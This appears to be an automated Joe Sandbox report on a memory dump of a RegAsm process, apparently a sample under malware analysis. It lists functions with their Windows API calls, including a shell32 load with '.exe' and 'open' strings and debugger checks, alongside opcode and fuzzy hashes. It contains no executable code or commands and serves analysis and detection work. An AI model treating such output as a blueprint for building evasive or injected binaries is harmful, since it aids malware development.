Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 87ef763bbd003f1d2de960a3db6ca709dde3cd444b7d1b6f895e6fd8deb0075d
Instruction ID: c043dc6610800097a8c7d9f7805d75e01504a092e95ab29a96a2aa982ce353c5
Opcode Fuzzy Hash: 87ef763bbd003f1d2de960a3db6ca709dde3cd444b7d1b6f895e6fd8deb0075d
Instruction Fuzzy Hash: FCA14732A041559FCF19DF28EC91BAE3BA1AB46314F18016EF801EB3D2C7398957D759

Function 004038C0 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 401
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(shell32.dll), ref: 0040390A

Strings

shell32.dll, xrefs: 00403905
.exe, xrefs: 004039E4, 004039F5, 00403C28, 00403C39
open, xrefs: 00403E04, 00403E25

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .exe$open$shell32.dll
API String ID: 1029625771-3690275032
Opcode ID: c9f59ac015d61ec70614d93d888e022ef416f64b299715dc7f56bdbe0cac2894
Instruction ID: 7d5b2598125341daaadbafcfaee473a7e4c633bdeea8f021ad5caa46309aa23f
Opcode Fuzzy Hash: c9f59ac015d61ec70614d93d888e022ef416f64b299715dc7f56bdbe0cac2894
Instruction Fuzzy Hash: EFE12A712083408BD718CF28CC45B6FBBE5BF85305F244A2DF489AB2D2D779E6458B5A

Function 00411432 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0041142C,00000016,0040BD98,?,?,8EB04C20,0040BD98,?), ref: 00411443
TerminateProcess.KERNEL32(00000000,?,0041142C,00000016,0040BD98,?,?,8EB04C20,0040BD98,?), ref: 0041144A
ExitProcess.KERNEL32 ref: 0041145C

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
Instruction ID: 3fe6f93935658f8ab67006e652a10cd0383134051074610e396dae59c432ecd7
Opcode Fuzzy Hash: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
Instruction Fuzzy Hash: 5DD09E31100148ABCF117F61EC0DA993F2AAF407557858025FA0A56131CB369993AA58

Function 00416DAF Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004164C2: GetConsoleOutputCP.KERNEL32(8EB04C20,00000000,00000000,0040BDB8), ref: 00416525

WriteFile.KERNELBASE(FFBF5BE8,00000000,?,0040BC75,00000000,00000000,00000000,00000000,?,?,0040BC75,?,?,004328B8,00000010,0040BDB8), ref: 00416F18
GetLastError.KERNEL32(?,0040BC75,?,?,004328B8,00000010,0040BDB8,?,?,00000000,?), ref: 00416F22

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
Instruction ID: cb585fdb2482b244a4d3bef91fab55670e651a1c55327e645a67e42ff2a15e13
Opcode Fuzzy Hash: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
Instruction Fuzzy Hash: 4461D775D04249AFDF10CFA8C844AEF7FB9AF09308F16415AF804A7252D379D986CB69

Function 00414A96 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00414AE2
GetFileType.KERNELBASE(00000000), ref: 00414AF4

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 14da27bdb5d952759cc947a18c1f6313485b17a09da5127208cbfccaf6a1781a
Instruction ID: 68df3f11dd2f645efc31e1e90aadc3e75d180b75955679e0b2236dab09e8ba97
Opcode Fuzzy Hash: 14da27bdb5d952759cc947a18c1f6313485b17a09da5127208cbfccaf6a1781a
Instruction Fuzzy Hash: 141175712087514AC7308E3E9C887637AD4ABD6370B39071BD1B6962F1C328E9C6965D

Function 00403EE0 Relevance: 3.0, APIs: 2, Instructions: 22
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,004038C0,00000000,00000000,8EB04C20), ref: 00403F06
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403F0F

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleThreadWait
String ID:
API String ID: 1891408510-0
Opcode ID: af3e1afe4429c917983b20489d93451d494df3de1508f1cbbf6b72916d2180c4
Instruction ID: 9ada69c4f7ca39928594594d106047c4e65b58e1a3541a0c5f1fc3d2bb6a9bfa
Opcode Fuzzy Hash: af3e1afe4429c917983b20489d93451d494df3de1508f1cbbf6b72916d2180c4
Instruction Fuzzy Hash: 10E08675758300BBD710EF24EC07F1A3BE4BB48B05F914A39F295A62D0D674B404965E

Function 00414D5D Relevance: 2.6, APIs: 2, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,00414C44,00000000,CF830579,00432C48,0000000C,00414D00,0040BD0B,?), ref: 00414DB3
GetLastError.KERNEL32(?,00414C44,00000000,CF830579,00432C48,0000000C,00414D00,0040BD0B,?), ref: 00414DBD

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
Instruction ID: ceb111eb948f9657ebdeceefd9bfba8073a9b29251fc9eed98a790ab6a2c0bec
Opcode Fuzzy Hash: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
Instruction Fuzzy Hash: 06114C336041241ADB246635BC867FE6749CBC1738F290A5FF808C72C1DE388CC2929C

Function 004143CC Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
Instruction ID: d7b25293e7db54f96000769fea1aeb7630fb582f3d7d0c2fc2c622193e8995c8
Opcode Fuzzy Hash: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
Instruction Fuzzy Hash: 620128373002255F9F25CF6EEC40ADB33A6FBC07243148136FA20CB684DA34D8829799

Function 00413EF2 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 00413F2C

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 86b5a37895ede01666616fd7f26fe40e68c10059cd8d9e9be6e6956d389c093e
Instruction ID: be02312cd07e58b193bdeee16c95f5fde802225de20a5ed1c7ae4422ede983e8
Opcode Fuzzy Hash: 86b5a37895ede01666616fd7f26fe40e68c10059cd8d9e9be6e6956d389c093e
Instruction Fuzzy Hash: 46110375A0420AAFCB05DF58E9419DB7BF9EF48304F04406AF809AB351D630EA15CBA8

Function 00414094 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,0000000C,?,?,004152D9,00000001,00000364,?,00000006,000000FF,?,?,0040E077,00415469), ref: 004140D5

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 14b8f9ac75b8980b6812ff089cde42dce8ba1f12a125e940596199f5ca44a4d3
Instruction ID: 7a371578952800d697783e4f14dfa84f7cfeb60b6085e341501622e7ba028638
Opcode Fuzzy Hash: 14b8f9ac75b8980b6812ff089cde42dce8ba1f12a125e940596199f5ca44a4d3
Instruction Fuzzy Hash: E9F0BB35605625ABDB215A63DC05BDB3F489FC5760B158123B904EB1A0CA68D9D1819D

Function 0041FB65 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,00000000,?,0041FF58,?,?,00000000,?,0041FF58,?,0000000C), ref: 0041FB82

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
Instruction ID: 28cfbda6749b70c9de2fbd9d245fef773b8951bf2dd70127050a9a6bf190398c
Opcode Fuzzy Hash: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
Instruction Fuzzy Hash: 05D06C3210010DFBDF128F84DC06EDA3FAAFB4C714F018010FA5856021C732E832AB94

Non-executed Functions

Function 0041EBA1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(3FC00000,2000000B,0041EEBF,00000002,00000000,?,?,?,0041EEBF,?,00000000), ref: 0041EC3A
GetLocaleInfoW.KERNEL32(3FC00000,20001004,0041EEBF,00000002,00000000,?,?,?,0041EEBF,?,00000000), ref: 0041EC63
GetACP.KERNEL32(?,?,0041EEBF,?,00000000), ref: 0041EC78

Strings

OCP, xrefs: 0041EBF5
ACP, xrefs: 0041EBBF

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
Instruction ID: 81a9d30784dd22d719d41cfb92251f6e816e7a4bc62bdb22216d11a6fc444572
Opcode Fuzzy Hash: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
Instruction Fuzzy Hash: 92218E3AB04101AADB34CF56CD05AD773A7AF50B50B568826FD0AD7211F736EE81C798

Function 0041ED76 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0041EE82
IsValidCodePage.KERNEL32(00000000), ref: 0041EECB
IsValidLocale.KERNEL32(?,00000001), ref: 0041EEDA
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0041EF22
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0041EF41

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 1f142972335a53d1e2416df24534188105d76140515381cc06687f0020485920
Instruction ID: eeabbf5cfaddba79e94d22b4dd48aaeada7d5b667952b3c456454f902e5df75d
Opcode Fuzzy Hash: 1f142972335a53d1e2416df24534188105d76140515381cc06687f0020485920
Instruction Fuzzy Hash: B4519075A00315ABDF20DFA6DC41BEB77B8FF48700F54442AAD14E7290E7789980CB69

Function 0041E412 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetACP.KERNEL32(?,?,?,?,?,?,00411EE1,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E4D3
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00411EE1,?,?,?,00000055,?,-00000050,?,?), ref: 0041E4FE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E661

Strings

utf8, xrefs: 0041E5D0

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: d2e92ad91d33230e432f41824a885b4f53a9106f8c4d9673b702c20c8aa694f9
Instruction ID: 5e8f11e88951c7c1c9557d61489bca48d24d80555c5ca4e9e4b82e7d51b65768
Opcode Fuzzy Hash: d2e92ad91d33230e432f41824a885b4f53a9106f8c4d9673b702c20c8aa694f9
Instruction Fuzzy Hash: 8F711775A00611AADB24AB77CC42BE773A8EF54708F14442BFD05D7281FB7CE9818799

Function 00415635 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004156C2

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
Instruction ID: 91afe31f9ab3d507f6121463a8ee3d13cfef47ac4a512e863f990cc27fdcea00
Opcode Fuzzy Hash: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
Instruction Fuzzy Hash: 92B15872E00645DFDB119F68C891BEEBBE5EF85310F14816BE815AB341D2389D81CBA9

Function 00407B01 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407B0D
IsDebuggerPresent.KERNEL32 ref: 00407BD9
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00407BF9
UnhandledExceptionFilter.KERNEL32(?), ref: 00407C03

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
Instruction ID: ca20a48664bdef0e78e9b146848890f6e34f40b99dedcfcf476291c653997e40
Opcode Fuzzy Hash: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
Instruction Fuzzy Hash: 1B314B75D0521CDBDF20DFA0D9497CDBBB8BF04304F1040AAE50DA7290EB756A859F09

Function 0041E825 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E879
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E8C3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E989

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: dd539c89c5381dfdaac91928ad5ed676a1006981e28db1904c6f4bbe4cde2b34
Instruction ID: efc99f0a6d6f1c6c35933ec1b38cf6b3cd41524c9fcadcabef19194d257b4763
Opcode Fuzzy Hash: dd539c89c5381dfdaac91928ad5ed676a1006981e28db1904c6f4bbe4cde2b34
Instruction Fuzzy Hash: EB618CB59101079BDB689F26CD82BEA77A8FF04340F14417BED16C6281F738D981DB58

Function 0040DD78 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 0040DE70
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 0040DE7A
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 0040DE87

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b5dd4f76152aea6ca03237fb28cccd4ebdc33645a90cdebeab5d7b36533c9830
Instruction ID: 2886232a598c6d0739cb6745ed5e05dca1263a9451a5c599d013a0f88592b0f0
Opcode Fuzzy Hash: b5dd4f76152aea6ca03237fb28cccd4ebdc33645a90cdebeab5d7b36533c9830
Instruction Fuzzy Hash: 4131E574D012189BCB21DF69D98878DBBB8BF08310F5041EAE41CA7291E774AF858F48

Function 0041B6EA Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6842ec62685f536c458231bd49ed90ba96433574387361dbf341c4072f4990b4
Instruction ID: e26fa8b462e3a3bc0dcd1cb195ad12d8a73a1b261898cc61817e46cff9ff25aa
Opcode Fuzzy Hash: 6842ec62685f536c458231bd49ed90ba96433574387361dbf341c4072f4990b4
Instruction Fuzzy Hash: 9841A3B5804219AEDB20DF69CC89AEEBBB9EF45304F1441EEE418D3201DB359E858F54

Function 0041EA78 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041EACC

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 22a4290edeb40b255e0ef88b49f21dfdd78c731e0f866b45595c0c5f80cee5a7
Instruction ID: 09566a44d01ac47d2cdad9f49e07ec0328cace9eeb3adbfa8c3b07b4827ecd72
Opcode Fuzzy Hash: 22a4290edeb40b255e0ef88b49f21dfdd78c731e0f866b45595c0c5f80cee5a7
Instruction Fuzzy Hash: D321AF36605206ABDB28DE26DD42AFB73A8EF44314B10407FED02D6241EB78AD81CB58

Function 0041E6FF Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

EnumSystemLocalesW.KERNEL32(0041E825,00000001,00000000,?,-00000050,?,0041EE56,00000000,?,?,?,00000055,?), ref: 0041E771

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 9637497d46bd12567f8eabdc0472934baf484039a92a8dbd1bfa50b3c5102b1b
Instruction ID: f28f85ac1fea5866725ce88a4d547c14bcace0560233e7335010750b785556cb
Opcode Fuzzy Hash: 9637497d46bd12567f8eabdc0472934baf484039a92a8dbd1bfa50b3c5102b1b
Instruction Fuzzy Hash: F0112C3A6007019FEB189F3AD8916FAB791FF80368B14442ED95747740E7757843C744

Function 0041ECA7 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0041EB22,00000000,00000000,?), ref: 0041ECD3

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: f78a423274370276909a02de998c8e2fb19ace7283c045400ea6aabaf7fbf6a9
Instruction ID: 6e93bce3e8a9596dc076f6a872b53f7d727095e2315f943068ff1bd0afa52940
Opcode Fuzzy Hash: f78a423274370276909a02de998c8e2fb19ace7283c045400ea6aabaf7fbf6a9
Instruction Fuzzy Hash: 56F02D3A600113BFDB245B26EC09BFB7764EB40354F19442AEC06A3280EA78FDC2C694

Function 0041E60D Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E661

Strings

utf8, xrefs: 0041E5D0

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: 2152daac5f42ae25a129a23ac8d896ce75da55d7df13b3f6dfbcda70826a3db5
Instruction ID: d369d087f973f2c2e7390e19339e1b86590d8fa7fa541369cb1b30fd3d4077c9
Opcode Fuzzy Hash: 2152daac5f42ae25a129a23ac8d896ce75da55d7df13b3f6dfbcda70826a3db5
Instruction Fuzzy Hash: B0F0F436A10105ABC714AF25DC45FFA73A8EB84324F40007EAA02D7281EA78AD418758

Function 0041E79A Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

EnumSystemLocalesW.KERNEL32(0041EA78,00000001,45F1B473,?,-00000050,?,0041EE1A,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0041E7E4

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 7822a5e4b117a09642d2d9f73cbe77476052005b15321de9f48d0f235ef5c92f
Instruction ID: 0c0c1f316863ef4a6d30beb722119c93d5a9d1266b3f20af8045389666d513f6
Opcode Fuzzy Hash: 7822a5e4b117a09642d2d9f73cbe77476052005b15321de9f48d0f235ef5c92f
Instruction Fuzzy Hash: BDF0C23A2003045FEB249F3A9881ABABB95FF80368F15442EFD568B690D6759C82C718

Function 00414138 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0040E0C6: EnterCriticalSection.KERNEL32(?,?,00412EDC,00000000,00432B68,0000000C,00412EA3,0000000C,?,004140C7,0000000C,?,004152D9,00000001,00000364,?), ref: 0040E0D5

EnumSystemLocalesW.KERNEL32(0041412B,00000001,00432BE8,0000000C,0041455A,00000000), ref: 00414170

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 80f246e533dc21f73d9613eff5259b5841ca6d0f841dd3ce2907f16627d73c59
Instruction ID: 198ab3507c4040aae18c9164df511e00e81c972c753b4360ebc7eca8a0771405
Opcode Fuzzy Hash: 80f246e533dc21f73d9613eff5259b5841ca6d0f841dd3ce2907f16627d73c59
Instruction Fuzzy Hash: 14F03C72A14204DFD710EF99E842B9C77B0FB84725F10422BE811DB2A0C7B959409B98

Function 0041E6B4 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

EnumSystemLocalesW.KERNEL32(0041E60D,00000001,45F1B473,?,?,0041EE78,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E6EB

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 8c2aaa4c0cd0d54cc735e91a7a0ddb58f51471a544283acf310fccb30414098b
Instruction ID: d7e3b5c502124c080ac9a43a58f0728b4bb26e435a168ea3e401fe3e83efba30
Opcode Fuzzy Hash: 8c2aaa4c0cd0d54cc735e91a7a0ddb58f51471a544283acf310fccb30414098b
Instruction Fuzzy Hash: A9F0E53A30025597CB149F3AD8557AABF94EFD1724F87405AEE06CB250C6799883C758

